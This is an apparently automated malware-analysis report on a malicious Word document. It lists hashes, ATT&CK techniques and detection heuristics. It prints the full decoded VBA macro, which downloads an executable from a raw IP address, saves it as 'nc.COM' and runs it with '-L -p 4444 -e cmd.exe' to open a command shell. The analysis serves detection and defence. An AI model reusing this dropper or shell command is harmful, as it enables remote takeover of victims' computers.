Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04f8b2f3a092f4ca…

MALICIOUS

Office (OLE)

2.33 MB Created: 2019-10-14 23:57:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: ba81e3f7ee5d88a20717ea278488da31 SHA-1: c9f6b8a6dc1c3d4227048ed16d0d7c27cd7a1927 SHA-256: 04f8b2f3a092f4cad578fb8e51f02e24b432cf21e4968ed95c3812ae33ff2883
362 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1059.003 Windows Command Shell

The VBA script uses WScript.Shell and CreateObject to download a file from 'hTtP://92.63.197.172/crypted.exe' and save it as 'nc.COM'. It then executes 'nc.COM -L -p 4444 -e cmd.exe', indicating an attempt to establish a reverse shell. The document body explicitly prompts the user to enable macro content, a common lure.

Heuristics 10

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL hTtP://92.63.197.172/crypted.exe Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2854 bytes
SHA-256: 3ee9eafc008255268e45a49533bb0662cf1d7f8f2e6a6e6b6f26fd50e10484d8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "moscow"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "moscowwww"
  Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr)
 

Sub ACADFASDFASD()
 
Dim GVuIHNlc2FtZQ
Dim hpamtsbm1vcHF
Dim MTIzNDU2Nzg
 
Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP")
Set hpamtsbm1vcHF = CreateObject("ADODB.StrEam")
Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll")
 
NTU1NTU = "hTtP://92.63.197.172/crypted.exe" 'Where to download the file from
NDQ0NA = "nc.COM" 'Name to save the file (on the local system)
MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading
 
GVuIHNlc2FtZQ.Open "GET", NTU1NTU, False
Sleep 1
GVuIHNlc2FtZQ.send
Sleep 1
hpamtsbm1vcHF.Type = 1
Sleep 2
hpamtsbm1vcHF.Open
Sleep 1
hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody
hpamtsbm1vcHF.savetofile NDQ0NA, 2
Sleep 1
MTIzNDU2Nzg.Run MzMz
 
 
End Sub


Attribute VB_Name = "swxidw"
' Test program for the Base64Coder module.

Option Explicit

Public Sub Main()
   Test1
   Test2
   End Sub

Private Sub Test1()
   Debug.Print "Test1 started."
   Check "Aladdin:open sesame", "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" ' example from RFC 2617
   Check "", ""
   Check "1", "MQ=="
   Check "22", "MjI="
   Check "333", "MzMz"
   Check "4444", "NDQ0NA=="
   Check "55555", "NTU1NTU="
   Check "abc:def", "YWJjOmRlZg=="
   Check "????", "Pz8/Pw=="
   Check "abcdefghijklnmopqrstuvwxyz0123456789???", "YWJjZGVmZ2hpamtsbm1vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Pz8/"
   Debug.Print "Test1 completed."
   End Sub

Private Sub Test2()
   Debug.Print "Test2 started."
   Dim i As Long
   For i = 1 To 10000
      Dim s1 As String: s1 = GenerateRandomString(80)
      Dim s2 As String: s2 = Base64EncodeString(s1)
      Dim s3 As String: s3 = Base64DecodeString(s2)
      If s3 <> s1 Then Debug.Print "Encode/decode failed for """ & s1 & """ / """ & s2 & """ / """ & s3 & """."
      Next
   Debug.Print "Test2 completed."
   End Sub

Private Sub Check(ByVal plainText As String, ByVal base64Text As String)
   Dim s1 As String: s1 = Base64EncodeString(plainText)
   Dim s2 As String: s2 = Base64DecodeString(base64Text)
   If s1 <> base64Text Or s2 <> plainText Then _
      Debug.Print "Check failed for """ & plainText & """ / """ & base64Text & """."
   End Sub

Private Function GenerateRandomString(ByVal MaxLen As Integer) As String
   Dim l As Integer: l = Int(Rnd() * (MaxLen + 1))
   Dim s As String: s = Space$(l)
   Dim p As Integer
   For p = 1 To l: Mid$(s, p, 1) = ChrW$(Int(Rnd * 256)): Next
   GenerateRandomString = s
   End Function